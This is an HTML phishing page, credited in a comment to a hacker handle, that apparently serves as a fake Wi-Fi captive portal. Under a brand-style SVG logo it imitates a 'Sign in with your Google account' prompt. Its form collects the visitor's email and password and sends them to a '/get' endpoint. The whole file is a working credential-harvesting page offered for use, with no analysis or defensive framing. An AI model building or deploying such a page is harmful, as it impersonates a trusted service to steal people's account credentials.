<!--By FlippieHacks
https://github.com/FlippieHacks/ -->
<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #af1634;
  margin-right: 100px
}


.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #0054a6;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #0054a6;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 4px solid #0054a6;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #0054a6;
  border: none;
  color: #ffffff;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
  font-weight: bold;
  display: block;
  margin: auto;
}

.submit-btn:hover {
  background: #0054a6;
}



</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="150.000000pt" height="25.000000pt" viewBox="0 0 1200.000000 197.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,197.000000) scale(0.100000,-0.100000)"
fill="#0054A6" stroke="none">
<path d="M10375 1883 c-853 -28 -3257 -122 -3263 -128 -11 -11 407 -118 658
-168 290 -59 483 -86 800 -114 170 -15 371 -17 1555 -19 844 -1 1394 -6 1451
-12 128 -15 215 -51 285 -122 63 -62 65 -54 13 56 -46 99 -162 272 -212 316
-78 70 -235 134 -400 163 -177 30 -499 41 -887 28z"/>
<path d="M11095 1188 c-128 -53 -504 -179 -722 -244 -73 -21 -133 -42 -133
-45 0 -8 -11 -4 185 -57 254 -68 610 -142 684 -142 20 0 79 16 131 37 112 43
452 213 457 228 3 10 -455 276 -473 274 -5 -1 -63 -24 -129 -51z"/>
<path d="M2321 900 l-364 -5 -29 -64 c-24 -53 -25 -62 -11 -56 29 12 143 24
221 25 l72 0 0 -318 c0 -292 -2 -321 -19 -355 l-19 -37 124 0 124 0 -20 33
c-19 30 -20 51 -20 356 l0 323 98 -7 c89 -6 103 -5 140 14 22 11 50 34 61 50
21 29 28 53 14 49 -5 -2 -172 -5 -372 -8z"/>
<path d="M3290 900 c-97 -18 -154 -54 -181 -114 -27 -59 -24 -122 7 -184 29
-58 66 -92 200 -180 51 -33 101 -74 113 -90 41 -58 20 -131 -45 -158 -96 -40
-199 6 -285 128 -17 23 -17 22 -24 -34 -4 -31 -4 -74 0 -96 6 -37 11 -42 58
-63 46 -21 67 -24 187 -24 127 0 138 2 185 27 89 47 125 106 125 203 0 101
-45 157 -217 269 -118 77 -146 109 -141 163 2 30 10 42 37 60 63 42 160 19
227 -54 l34 -37 0 36 c0 19 -3 56 -6 81 -6 43 -8 46 -49 56 -62 15 -173 21
-225 11z"/>
<path d="M8330 905 c-8 -2 -36 -7 -62 -10 -54 -7 -62 -20 -18 -28 46 -10 97
-69 203 -237 l97 -154 0 -166 c0 -131 -3 -170 -15 -186 -8 -10 -15 -22 -15
-26 0 -5 55 -8 121 -8 l121 0 -16 25 c-13 20 -16 55 -16 193 l0 169 100 174
c55 96 116 189 135 207 19 18 35 34 35 37 0 3 -41 5 -90 5 -89 0 -90 0 -85
-23 5 -17 -13 -57 -67 -150 -40 -70 -75 -127 -78 -127 -3 0 -44 61 -92 134
-57 88 -97 140 -116 150 -29 15 -114 28 -142 21z"/>
<path d="M9189 900 c-144 -26 -215 -119 -189 -246 15 -72 77 -139 200 -219
119 -77 150 -112 150 -169 0 -34 -6 -48 -31 -72 -27 -26 -37 -29 -98 -29 -58
0 -75 4 -117 30 -29 18 -61 50 -79 77 -16 26 -33 47 -37 47 -5 1 -8 -41 -8
-93 l0 -94 53 -22 c72 -32 247 -40 331 -16 82 24 150 91 165 165 27 129 -16
193 -219 329 -129 86 -161 134 -130 193 14 26 62 49 102 49 47 0 130 -42 161
-81 l27 -34 -2 80 -3 80 -36 12 c-49 16 -184 23 -240 13z"/>
<path d="M80 891 c0 -6 4 -11 9 -11 27 0 32 -64 29 -402 -3 -329 -4 -347 -23
-368 l-20 -22 235 4 c211 4 240 6 288 25 71 29 115 64 137 109 22 46 22 141 1
182 -21 40 -74 81 -127 96 l-42 13 36 22 c52 32 77 78 77 142 0 96 -50 162
-150 198 -48 18 -450 28 -450 12z m356 -93 c43 -21 67 -61 67 -113 0 -82 -63
-135 -160 -135 l-53 0 0 128 c0 71 3 132 8 136 10 11 106 0 138 -16z m40 -357
c57 -26 74 -54 74 -121 0 -101 -55 -150 -168 -150 -97 0 -92 -8 -92 151 l0
139 73 0 c49 0 85 -6 113 -19z"/>
<path d="M810 895 c0 -4 8 -14 18 -21 16 -11 17 -43 20 -370 3 -349 2 -359
-18 -386 l-21 -28 126 0 126 0 -15 22 c-13 18 -16 54 -16 185 0 155 1 163 20
163 31 0 87 -57 132 -134 56 -97 133 -200 164 -221 22 -14 46 -16 145 -14 77
3 122 8 131 17 9 9 7 12 -13 12 -46 0 -115 57 -185 153 -100 135 -145 188
-178 208 l-29 17 44 12 c90 24 149 119 134 216 -5 38 -16 57 -49 90 -63 63
-113 75 -343 81 -106 3 -193 2 -193 -2z m311 -85 c52 -15 81 -50 87 -108 8
-88 -49 -152 -135 -152 l-43 0 0 128 c0 71 3 132 7 135 9 10 42 8 84 -3z"/>
<path d="M1630 894 c0 -3 9 -17 20 -31 19 -25 20 -41 20 -373 0 -336 -1 -348
-21 -374 l-20 -26 132 0 132 0 -21 23 c-22 23 -22 28 -22 379 0 344 1 356 21
382 l20 26 -130 0 c-72 0 -131 -3 -131 -6z"/>
<path d="M2720 895 c0 -3 9 -14 20 -25 19 -19 20 -33 20 -374 0 -342 -1 -354
-21 -380 l-20 -26 131 0 131 0 -20 26 c-20 26 -21 38 -21 380 0 341 1 355 20
374 11 11 20 22 20 25 0 3 -58 5 -130 5 -71 0 -130 -2 -130 -5z"/>
<path d="M3720 893 c0 -5 7 -17 15 -27 22 -29 22 -713 0 -742 -8 -10 -15 -22
-15 -26 0 -5 54 -8 120 -8 66 0 120 3 120 8 0 4 -7 16 -15 26 -12 16 -15 54
-15 178 l0 158 165 0 165 0 0 -164 c0 -133 -3 -166 -15 -176 -8 -7 -15 -16
-15 -21 0 -5 54 -9 120 -9 66 0 120 3 120 8 0 4 -7 16 -15 26 -22 29 -22 713
0 742 8 10 15 22 15 27 0 4 -54 7 -120 7 -66 0 -120 -3 -120 -7 0 -5 7 -17 15
-27 23 -30 22 -301 -1 -310 -20 -8 -278 -8 -298 0 -23 9 -24 280 -1 310 8 10
15 22 15 27 0 4 -54 7 -120 7 -66 0 -120 -3 -120 -7z"/>
<path d="M5050 891 c0 -5 5 -13 10 -16 6 -3 10 -15 10 -26 0 -10 -60 -173
-134 -360 -93 -237 -143 -350 -162 -370 l-28 -29 88 0 c80 0 87 2 81 17 -4 11
11 61 36 126 32 81 47 109 63 113 12 2 77 3 145 2 l124 -3 39 -105 c23 -63 37
-114 33 -128 -5 -22 -5 -22 116 -22 l121 0 -28 33 c-18 22 -71 150 -163 402
l-136 370 -108 3 c-65 2 -107 -1 -107 -7z m143 -301 c25 -69 48 -133 52 -142
7 -17 -2 -18 -105 -18 -86 0 -111 3 -107 13 3 6 29 72 58 144 29 73 53 132 55
130 1 -1 22 -58 47 -127z"/>
<path d="M5620 895 c0 -3 9 -14 20 -25 19 -19 20 -33 20 -374 0 -342 -1 -354
-21 -380 l-20 -26 131 0 131 0 -20 26 c-20 26 -21 38 -21 380 0 341 1 355 20
374 11 11 20 22 20 25 0 3 -58 5 -130 5 -71 0 -130 -2 -130 -5z"/>
<path d="M6000 895 c0 -4 8 -14 18 -21 16 -11 17 -43 20 -370 3 -349 2 -359
-18 -386 l-21 -28 126 0 126 0 -15 22 c-13 18 -16 54 -16 185 0 178 0 179 58
149 40 -21 70 -58 156 -188 42 -64 92 -129 111 -144 34 -25 38 -26 154 -23 78
3 124 8 133 17 9 9 7 12 -10 12 -56 0 -106 46 -227 208 -44 59 -99 121 -123
139 l-43 33 40 16 c70 28 121 106 121 184 -1 39 -34 103 -69 133 -56 47 -117
59 -328 64 -106 3 -193 2 -193 -2z m320 -89 c43 -16 80 -68 80 -113 0 -83 -57
-143 -137 -143 l-43 0 0 128 c0 71 3 132 7 135 10 10 54 7 93 -7z"/>
<path d="M6648 866 c16 -18 42 -67 58 -107 15 -41 78 -207 140 -369 l112 -295
43 -3 44 -3 75 211 c41 115 78 210 81 210 3 0 32 -66 64 -147 81 -206 110
-261 139 -269 14 -3 29 -4 33 -1 5 3 65 171 133 373 95 279 132 374 153 396
15 17 27 32 27 34 0 2 -38 4 -85 4 -83 0 -85 -1 -80 -22 3 -14 -25 -114 -72
-256 l-78 -233 -99 244 c-54 134 -101 250 -106 256 -4 7 -46 -98 -101 -252
l-94 -265 -88 236 c-64 170 -87 245 -83 264 l6 28 -126 0 -126 0 30 -34z"/>
<path d="M7880 895 c0 -3 6 -16 14 -28 13 -20 5 -46 -100 -312 -157 -399 -164
-414 -193 -441 l-26 -24 89 0 c78 0 87 2 82 17 -7 18 70 223 88 236 6 4 72 6
146 5 l134 -3 39 -105 c21 -58 36 -115 34 -127 -4 -23 -3 -23 116 -23 l120 0
-22 24 c-27 29 -45 74 -192 473 l-114 313 -107 0 c-60 0 -108 -2 -108 -5z
m149 -319 c28 -76 50 -141 48 -143 -3 -2 -52 -2 -109 -1 l-105 3 55 143 c30
78 56 141 58 140 1 -2 25 -66 53 -142z"/>
</g>
</svg>

  
  </div>

  <div class="form-container">

    <center><h1>Sign in with your <b>Google</b> account</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email or mobile phone number" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

      <button class="submit-btn" type="submit">CONNECT</button>

    </form>

  </div>

</div>

</body>
</html>
